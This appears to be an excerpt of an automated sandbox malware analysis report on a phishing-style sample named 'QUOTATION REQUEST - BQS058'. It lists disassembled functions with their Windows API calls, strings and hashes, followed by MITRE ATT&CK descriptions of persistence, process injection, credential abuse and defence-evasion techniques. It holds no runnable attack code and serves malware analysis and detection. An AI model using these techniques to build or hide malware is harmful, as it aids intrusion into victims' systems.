Instruction ID: c53ce1e6430cdeab2498b87260f7a135d962f91e34774760115db71d9af8a1d8
Opcode Fuzzy Hash: df724d04ec94fb5ce2b813c8387c33f75f2f756c02fa974a5bdc57783dd27e0d
Instruction Fuzzy Hash: 9D21F570A40229AFCF10FF64CC81EAE7BBABF44300F44446AE984AF241DB34E911DB61

Function 010566D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01056761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0105676C

Strings

Combobox, xrefs: 0105672E

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 253fefd9b4c5aae1cc4daa1bede2b97a6b98a58e16c7129917dd0264e22dfcad
Instruction ID: d5b3312e26ca621424cd4236e6f86c798d79ab7487396fe438662fcc3d437911
Opcode Fuzzy Hash: 253fefd9b4c5aae1cc4daa1bede2b97a6b98a58e16c7129917dd0264e22dfcad
Instruction Fuzzy Hash: 5A11B6752002096FEFA29E58CC84EBB77AAFB48364F500129FD9497291E6369C5187A0

Function 01056C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00FD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FD1D73
Part of subcall function 00FD1D35: GetStockObject.GDI32(00000011), ref: 00FD1D87
Part of subcall function 00FD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD1D91

GetWindowRect.USER32(00000000,?), ref: 01056C71
GetSysColor.USER32(00000012), ref: 01056C8B

Strings

static, xrefs: 01056C4E

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: d5b3d8cd397ea8d0e30f86b68bc25e1dc4dd1f985c673380ac15d6dd43f181a6
Instruction ID: 02ba8245a34ad65a38f358c39bb50ce5fe979b07f0d30299eadb77a915384c94
Opcode Fuzzy Hash: d5b3d8cd397ea8d0e30f86b68bc25e1dc4dd1f985c673380ac15d6dd43f181a6
Instruction Fuzzy Hash: 1421177291020AAFDB55DFA8C845AFA7BA9FB08314F004619FD95D3240D63AE850DB60

Function 01056920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 010569A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010569B1

Strings

edit, xrefs: 01056986

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: e69d319d69e7ce3cec9ac6a5f9e22dc3510e5fe35e1b2be8e981d1f464f9b04c
Instruction ID: 30e214d0f304926f006e0321028472136342819c5479483759bfa23fe5fa2873
Opcode Fuzzy Hash: e69d319d69e7ce3cec9ac6a5f9e22dc3510e5fe35e1b2be8e981d1f464f9b04c
Instruction Fuzzy Hash: 97116D71100205ABEF919E68DC40AEB37BEEB053B8F904714FDE1971D0C636DC519760

Function 010329AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01032A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 01032A41

Strings

0, xrefs: 01032A18

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 1771b0fbf49e5ff808082453a02041e60fdabf5d2186e503c2602c35636d6cb3
Instruction ID: 1aea94964e54bb527d40103413a70d03625c6bb463c4b2c3d33cf29e9ca6716b
Opcode Fuzzy Hash: 1771b0fbf49e5ff808082453a02041e60fdabf5d2186e503c2602c35636d6cb3
Instruction Fuzzy Hash: FE110832901614ABEF71DE5CDC44BAE7BFCABC6200F144062EAD5E7290D774A907C791

Function 010421D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0104222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01042255

Strings

<local>, xrefs: 0104221D

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 805df1931087ccb65408bdb13773fcabba68fc70664b90934c12f1947b9c89c2
Instruction ID: 2aed56a9d8b99cb1bfa0deec81847c3216840a6a0ad17f92b1068e2521529617
Opcode Fuzzy Hash: 805df1931087ccb65408bdb13773fcabba68fc70664b90934c12f1947b9c89c2
Instruction Fuzzy Hash: 0211C2B0641225FBDB258F55ADC8FBBFFA8FF06651F00827AFA9596000D2705990C6F0

Function 01047D8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 01047FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,01047DB3,?,00000000,?,?), ref: 0104800D

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01047DB6
htons.WSOCK32(00000000,?,00000000), ref: 01047DF3

Strings

255.255.255.255, xrefs: 01047DCE

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: d0484822aefebe9f5503a8ed90d0fb602a71f1733df698138d57d96c3a7031f3
Instruction ID: 1a0072147f30b1f6b17c84ea4ecc587061aa12bcbe770deb7da6fde06605c5e3
Opcode Fuzzy Hash: d0484822aefebe9f5503a8ed90d0fb602a71f1733df698138d57d96c3a7031f3
Instruction Fuzzy Hash: 6211C87550021AABDB20AF68CC85FFEB775FF14320F10466BEA919B2D1DB72A810C791

Function 01028E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01028E73

Strings

ComboBox, xrefs: 01028E12
ListBox, xrefs: 01028E3D

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: dae481e9bd077ec83eae742d8249991d66ccf6845f72203636a4c77b42b69a44
Instruction ID: 516e49ba30b9c514c764518cf87c8fce809a683a6c41f1aad3d8925e8c9ae13a
Opcode Fuzzy Hash: dae481e9bd077ec83eae742d8249991d66ccf6845f72203636a4c77b42b69a44
Instruction Fuzzy Hash: 0301F575641229EB9F14FBA4CC518FE77AAAF15320B04460AF8B15B3E1EE355808D650

Function 01028CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 01028D6B

Strings

ComboBox, xrefs: 01028D0A
ListBox, xrefs: 01028D35

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 77d56cabada354b3f75b903ec4d86d4794dfb119d09e5e75459ab543ec6769ca
Instruction ID: b3c4035d9125729275639c7d58c3ce42ab4c24e03fce3335736d5b13dfd251f5
Opcode Fuzzy Hash: 77d56cabada354b3f75b903ec4d86d4794dfb119d09e5e75459ab543ec6769ca
Instruction Fuzzy Hash: 14014275B4021AABDB14FBA0CD52EFF77E9DF15300F14001AF88267291EE298A0CA271

Function 01028D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 01028DEE

Strings

ComboBox, xrefs: 01028D8F
ListBox, xrefs: 01028DBA

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 497cd8830cce859eed446b513b5f49d03d9a8bbcf906517de47b9b43496d99b7
Instruction ID: 8096bca8ade02f33cee2c02e7aba2ed59f07be1ba5d3e00f05139f5ff0a24315
Opcode Fuzzy Hash: 497cd8830cce859eed446b513b5f49d03d9a8bbcf906517de47b9b43496d99b7
Instruction Fuzzy Hash: 3D01F275B4121AA7DB10FAA8CD51EFF77E99F21300F14401AF88267292DA298A0CA271

Function 01034F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 01034F46
_wcscmp.LIBCMT ref: 01034F58

Strings

#32770, xrefs: 01034F52

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 53b12c57494b8c3bb233d28da58c95770dc9708f5ab8e7c0d5f9fec54029e661
Instruction ID: 2d2a6f17cf4ff2cbbc25b3b04c4bef222bf7d605e884d8b3de06496bd0c31148
Opcode Fuzzy Hash: 53b12c57494b8c3bb233d28da58c95770dc9708f5ab8e7c0d5f9fec54029e661
Instruction Fuzzy Hash: 48E0D83260432D2BD720AA99EC49FA7F7ECEB85B70F05006BFD84D7041D5659A4587E0

Function 0100B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0100B314: _memset.LIBCMT ref: 0100B321

Part of subcall function 00FF0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0100B2F0,?,?,?,00FD100A), ref: 00FF0945

IsDebuggerPresent.KERNEL32(?,?,?,00FD100A), ref: 0100B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FD100A), ref: 0100B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0100B2FE

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 6378845503e3954a0dfcec5d2070738be1762d80869149c3a3afd7702818b7b1
Instruction ID: c9a64aec96950ef821cb951909b3eb29a8cfa7f1c3ea66ce1472629a9721d966
Opcode Fuzzy Hash: 6378845503e3954a0dfcec5d2070738be1762d80869149c3a3afd7702818b7b1
Instruction Fuzzy Hash: ABE039746007018AE7329F29D4083467BE8AF00304F10CD6DE8C6C7786EBB99444CBA1

Function 01011935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 01011775

Part of subcall function 0104BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0101195E,?), ref: 0104BFFE
Part of subcall function 0104BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0104C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0101196D

Strings

WIN_XPe, xrefs: 01011788

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 7957b019982f5a472a6af958edb1e504bb95caad195261198f99685c5b9afe13
Instruction ID: 606009f0ca9eb3532cbb055020fc2987593a82f48b916aa13199970ec3624398
Opcode Fuzzy Hash: 7957b019982f5a472a6af958edb1e504bb95caad195261198f99685c5b9afe13
Instruction Fuzzy Hash: 78F0C071800109DFDB29DBA5C598AED7BF8BB18301F540095E385A2194DB7A8F44CF61

Function 01055964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0105596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01055981

Part of subcall function 01035244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC

Strings

Shell_TrayWnd, xrefs: 01055967

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f820722df6f04f0cf38263d46eb8bddeca374bf86da77b88ea41ada58032c5de
Instruction ID: de1a725593e6c9fa4311ae87df147d40b3127e5677a15bb6c7991cc8f308a2cd
Opcode Fuzzy Hash: f820722df6f04f0cf38263d46eb8bddeca374bf86da77b88ea41ada58032c5de
Instruction Fuzzy Hash: ABD0C935384312B7E774BA719C0EFD77A18AB54B50F000829B3C9AB1D4C9E99800C764

Function 01055998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010559AE
PostMessageW.USER32(00000000), ref: 010559B5

Part of subcall function 01035244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC

Strings

Shell_TrayWnd, xrefs: 010559A7

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d9554b42812539c8719aabed7016aee103e0c5e9701331fb60cb3b0e53f42eea
Instruction ID: 4edf58efe1816e2c65a7dd4d11ba38b903af7166d049ad6fdd9a3b778a22b55f
Opcode Fuzzy Hash: d9554b42812539c8719aabed7016aee103e0c5e9701331fb60cb3b0e53f42eea
Instruction Fuzzy Hash: 40D0C9313C4312BBE774BA719C0EFD77618AB55B50F000829B3C5AB1D4C9E9A800C764

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

